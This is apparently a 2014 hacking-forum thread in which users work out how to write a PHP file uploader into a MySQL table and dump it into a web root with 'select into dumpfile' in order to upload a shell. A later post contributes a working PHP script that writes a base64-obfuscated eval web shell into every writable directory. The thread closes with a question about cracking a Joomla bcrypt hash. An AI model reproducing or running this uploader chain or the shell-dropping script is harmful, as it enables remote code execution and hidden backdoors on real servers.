DrMTR Posted November 3, 2014 Posted November 3, 2014 Hi to all ! I testing vulnerable app in localhost, and try to insert php upload form code into db table, but give me MySQL syntax error every time i tryed.. This htm form successfully inserted into DB via SQLmap insert into userform values ('<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <head>Upload File</head> <body> <<form enctype="multipart/form-data" action="uploader.php" method="POST"> <input type="hidden" name="MAX_FILE_SIZE" value="100000" /> Choose a file to upload: <input name="uploadedfile" type="file" /><br /> <input type="submit" value="Upload File" /> </form> </body> </html>'); but this give me SQL syntax error in line 1 every time, when try to insert into DB: insert into user_upload values (' <?php $target_path = '/var/www/'; $target_path = $target_path . basename( $_FILES['uploadedfile']['name']); if(move_uploaded_file($_FILES['uploadedfile']['tmp_name'], $target_path)) { echo "The file ". basename( $_FILES['uploadedfile']['name']). " has been uploaded"; } else{ echo "There was an error uploading the file, please try again!"; } ?>'); Where is the problem.? I forget to tell that DB tables are allready created into DB exploitdb. Quote
digininja Posted November 3, 2014 Posted November 3, 2014 You hvae a quoted string which you are breaking out of with quotes in the lines you are injecting, try changing all the quotes in the string to double quotes and the outside ones to single. Sounds like an interesting vulnerability where you can pull a contents from a database and get them executed. Quote
DrMTR Posted November 3, 2014 Author Posted November 3, 2014 Yeah its single quotes, but why then first form (htm form) inserted successfully into db, and second give me SQL error.? Can you change the quotes, and then try to insert into db table again.? Quote
cooper Posted November 3, 2014 Posted November 3, 2014 The way SQL works is that when you want to put a string in a column, you say: insert into table (column_name) values ('THE_DATA_TO_INSERT'); Note that the data to insert into column_name is delimited by the single quotes. When that THE_DATA_TO_INSERT itself contains single quotes, you need to escape them either by preceding each single quote with a slash (\') or, because HTML allows you to do this, use a double quote (") instead of the single quote character in your data. Quote
digininja Posted November 3, 2014 Posted November 3, 2014 If you look at the syntax highlighted code you've provided you'll see that in the first example all that is being inserted is green meaning it is all considered a single string, in the second example where the single quotes are closed early the text changes to black then back to green where the single quotes open again. Quote
DrMTR Posted November 5, 2014 Author Posted November 5, 2014 If you look at the syntax highlighted code you've provided you'll see that in the first example all that is being inserted is green meaning it is all considered a single string, in the second example where the single quotes are closed early the text changes to black then back to green where the single quotes open again. So in fact if i change "blacklighted text" into " " will be OK? insert into user_upload values (' <?php $target_path = "/var/www/"; $target_path = $target_path . basename( $_FILES["uploadedfile"]["name"]); if(move_uploaded_file($_FILES["uploadedfile"]["tmp_name"], $target_path)) { echo "The file ". basename( $_FILES["uploadedfile"]["name"]). " has been uploaded"; } else{ echo "There was an error uploading the file, please try again!"; } ?>'); Quote
digininja Posted November 5, 2014 Posted November 5, 2014 That looks ok, try it and see. What are you exploiting, I'm curious about what vulnerability pulls code from a database and executes it Quote
DrMTR Posted November 5, 2014 Author Posted November 5, 2014 Yeah SQL code inserted into DB table, and executes into evil php uploader. Grab the content from SQL table and dump to .php file using these command: select * into dumpfile '/var/www/uploadform.php' from userform; select * into dumpfile '/var/www/uploader.php' from user_upload; After that sumply execute uploadform.php and upload your favorite shell into host. Thanks for everything guys. :) Quote
digininja Posted November 5, 2014 Posted November 5, 2014 That makes sense, I was thinking it was executing from the database. If you've got file write permissions you've probably also got read permissions if you've not checked that already. Quote
DrMTR Posted November 5, 2014 Author Posted November 5, 2014 Yea you must have /var/www/ writable :) Quote
digininja Posted November 5, 2014 Posted November 5, 2014 Or have local file inclusion. I tend to look for file upload features on sites which allow uploads into the document root, usually folders called userdata or uploads, they are writable when the rest isn't Quote
cooper Posted November 6, 2014 Posted November 6, 2014 Which distro uses /var/www for this though? On my Gentoo's Apache install the root folder is /var/www/<hostname>/htdocs for instance. Quote
i8igmac Posted November 8, 2014 Posted November 8, 2014 Ill provide some of my exciting automation :-p this little snipp will recursively scan directorys for writable permissions and then write a small shell... If you have php execution, phpinfo(); then try eval(codebelow); carefule, this may write a few thousand shells to ur hard drive :-) chdir('../'); $path = realpath(getcwd()); $objects = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($path), RecursiveIteratorIterator::SELF_FIRST); foreach($objects as $name => $object){ if (is_dir($name)) { if (is_writable($name)) { echo $name . ' '; file_put_contents($name. '/tmp.php', base64_decode("PD9ldmFsKGJhc2U2NF9kZWNvZGUoJF9HRVRbY214eXpdKSk7Pz4=")); } } } Quote
DrMTR Posted November 13, 2014 Author Posted November 13, 2014 ^^ Thanks for script. Its very usefull for finding writable folders. I dont want to open a new thread, did someone know why this Joomla hash is very long compared with other hash in DB $2y$10$bTQfeWF8vHD3BJ/RvoMm4uLWBD02O/YPQN9Y0NfiRlHyHlmD1FmB. How to crack this one.? Quote
cooper Posted November 14, 2014 Posted November 14, 2014 Fields are separated by the $ character. 2y means "The most secure version of Blowfish" 10 is the amount of blowfish iterations. The remainder is the blowfish hash where I suspect the bit up to the slash is the salt and the remainder the actual hash value. Quote
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.